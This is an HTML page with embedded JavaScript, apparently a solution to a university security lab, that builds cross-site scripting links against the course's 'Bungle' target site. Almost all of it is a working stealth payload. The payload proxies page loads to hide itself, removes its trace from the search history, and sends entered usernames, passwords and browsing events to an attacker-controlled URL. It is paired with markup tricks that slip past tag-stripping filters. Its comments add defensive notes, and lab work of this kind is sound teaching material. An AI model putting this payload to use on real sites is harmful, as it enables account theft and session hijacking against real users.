- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- /*
-  * Extend this function:
-  *
-  * payload(attacker) is the demonstration script for the cross-site
-  * scripting exercise in this listing. makeLink() serializes it with
-  * payload.toString() and places the text in the q parameter of a search URL
-  * on the target site, so it is meant to run inside the target's own pages
-  * with `attacker` set to the reporting URL.
-  *
-  * What the body does:
-  *  - hides the html element, then proxy() loads the path built by
-  *    String.fromCharCode(46, 47) (the two characters dot and slash) into it
-  *    with jQuery .load() and calls listen() after every load to re-attach
-  *    the handlers;
-  *  - bunglelnk, search, searchAgain, searchHistory and backforward replace
-  *    normal navigation with in-page loads and call history.pushState or
-  *    history.replaceState so the address bar shows the URL that was loaded;
-  *  - searchHistory() also removes history-list links whose HTML contains the
-  *    text payload(attacker, target);
-  *  - login, create and logout submit with $.post to the target. log() issues
-  *    $.get(attacker, data): login reports event, user and pass (read from
-  *    #username and #userpass), logout reports event and user, and every
-  *    proxy() load reports event nav with the url and, when present, the
-  *    logged-in user name. create reports nothing.
-  *
-  * Most string literals are written as /regex/.source or String.fromCharCode
-  * rather than quoted strings -- presumably for the filter level that strips
-  * quotes; confirm against the lab description.
-  *
-  * No comments are added inside the body: its exact source text is what gets
-  * injected, so any edit in there changes what makeLink() emits.
-  *
-  * Defensive notes: the credentials are read from the form fields, so cookie
-  * flags such as HttpOnly do not limit this. Encoding q for the HTML context
-  * in which the search page writes it, together with a
-  * Content-Security-Policy that disallows inline script, is what stops it.
-  * On the wire it appears as cross-origin GET requests carrying event, user,
-  * pass and url query parameters.
-  */
- function payload(attacker) {
- var target = 'http://bungle-cs461.csl.illinois.edu/';
- function listen(href) {
- bunglelnk(href)
- search(href)
- searchAgain(href)
- searchHistory()
- login()
- create()
- logout()
- backforward()
- }
- function bunglelnk(href) {
- $(/#bungle-lnk/.source).on(/click/.source, function(event) {
- event.preventDefault()
- history.pushState(null, null, href);
- proxy(target)
- })
- }
- function search(href) {
- $(/#search-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- history.pushState(null,null,href)
- var query1 = $(/#query/.source).val()
- var query = query1.replace(/\s/g, '+');
- req = target + /search?q=/.source + query
- $.get(req, {q: query1}, function(){
- history.pushState(null, null, req);
- proxy(req)
- })
- })
- }
- function searchAgain(href) {
- $(/#search-again-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- history.pushState(null, null, href);
- proxy(target)
- })
- }
- function searchHistory(){
- var histlist = $(/#history-list/.source)
- if(histlist.html())
- {
- histlist.children(/a/.source).each(function(index, element){
- var a = $(element)
- var b = /payload(attacker, target)/.source
- if(~a.html().indexOf(b))
- a.remove()
- a.on(/click/.source, function(event){
- event.preventDefault()
- var query1 = a.text()
- var query = query1.replace(/\s/g, '+');
- req = target + /search?q=/.source + query
- $.get(target+/search/.source, {q: query1}, function(){
- history.pushState(null,null,req)
- proxy(req)
- })
- })
- })
- }
- }
- function login() {
- $(/#log-in-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- var use = $(/#username/.source).val()
- var pas = $(/#userpass/.source).val()
- var event = /login/.source
- $.post(target + event, {username: use, password: pas}, function() {
- log({event: event, user: use, pass: pas})
- proxy(String.fromCharCode(46, 47))
- })
- })
- }
- function create() {
- $(/#new-account-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- var use = $(/#username/.source).val()
- var pas = $(/#userpass/.source).val()
- var event = /create/.source
- $.post(target + event, {username: use, password: pas}, function() {
- proxy(target)
- })
- })
- }
- function logout() {
- $(/#log-out-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- var use = $(/#logged-in-user/.source).text()
- var event = /logout/.source
- $.post(target +event, {}, function(){
- log({event: event, user: use})
- proxy(target)
- })
- })
- }
- function backforward() {
- window.onpopstate = function(event) {
- proxy(window.location.href)
- }
- }
- function log(data) {
- $.get(attacker, data);
- }
- function proxy(href) {
- history.replaceState(null, null, href);
- $(/html/.source).load(href, function() {
- $(/html/.source).show();
- var use = $(/#logged-in-user/).text()
- if(use)
- log({event: /nav/.source, user: use, url: href});
- else
- log({event: /nav/.source, url: href});
- listen(href);
- })
- }
- $(/html/.source).hide();
- proxy(String.fromCharCode(46, 47));
- }
/**
 * Build the lab link for one filter level of the target's search page.
 *
 * The link is `target + "./search"` with the `xssdefense` level and a
 * percent-encoded `q` value. `q` carries the source text of `payload`
 * followed by a call that passes `attacker`, wrapped in the markup chosen
 * for that level. Anything other than a number from 0 to 4 yields undefined.
 *
 * Defensive reading: each row below shows why removing blocklisted
 * substrings from `q` is not a substitute for encoding `q` for the HTML
 * context the search page writes it into.
 *
 * @param {number} xssdefense - filter level, 0 through 4
 * @param {string} target - base URL of the site under test
 * @param {string} attacker - URL handed to payload(), which sends its reports there
 * @returns {string|undefined} the link, or undefined for an unknown level
 */
function makeLink(xssdefense, target, attacker) {
  // [opening markup, closing markup] per level. Tag ends are kept as separate
  // string pieces, presumably so the inline script block hosting this code is
  // not cut short by the HTML parser.
  var markupByLevel = [
    // 0: no defense -- a plain script element.
    ["<script" + ">", "</script" + ">"],
    // 1: script tag removed -- the nested spelling is still a script tag
    //    after one removal pass.
    ["<scrscriptipt" + ">", "</scrscriptipt" + ">"],
    // 2: script tag removed recursively -- an event-handler attribute is
    //    used instead of a script element.
    ["<body onload=\"", "\">"],
    // 3: several tags removed recursively -- a zero-size iframe with an
    //    onload handler.
    ["<iframe onload=\"", "\" style='width:0;height:0;border:0; border:none;'></iframe" + ">"],
    // 4: quotes and semicolons removed -- this listing reuses the level-1
    //    markup here.
    ["<scrscriptipt" + ">", "</scrscriptipt" + ">"]
  ];

  // Only a primitive number selects a row (strict match); every other value
  // falls through without touching payload or attacker.
  var wrap = typeof xssdefense === "number" ? markupByLevel[xssdefense] : undefined;
  if (!wrap) {
    return undefined;
  }

  var prefix = target + "./search?xssdefense=" + xssdefense.toString() + "&q=";
  var injected = wrap[0] + payload.toString() + ";payload(\"" + attacker + "\");" + wrap[1];
  return prefix + encodeURIComponent(injected);
}
// Lab configuration: the site under test, the loopback URL that receives the
// payload's reports, and the filter level (0-4) the link is built for.
var attacker = "http://127.0.0.1:31337/stolen";
var target = "http://bungle-cs461.csl.illinois.edu/";
var xssdefense = 1;

// Once the DOM is ready, render the generated link inside the page's h3.
// The anchor is assembled by string concatenation; the q value inside the
// href was already percent-encoded by makeLink().
$(document).ready(function renderLink() {
  var href = makeLink(xssdefense, target, attacker);
  var anchor = "<a target=\"run\" href=\"" + href + "\">Try Bungle!</a>";
  $("h3").html(anchor);
});
- </script>
- <h3></h3>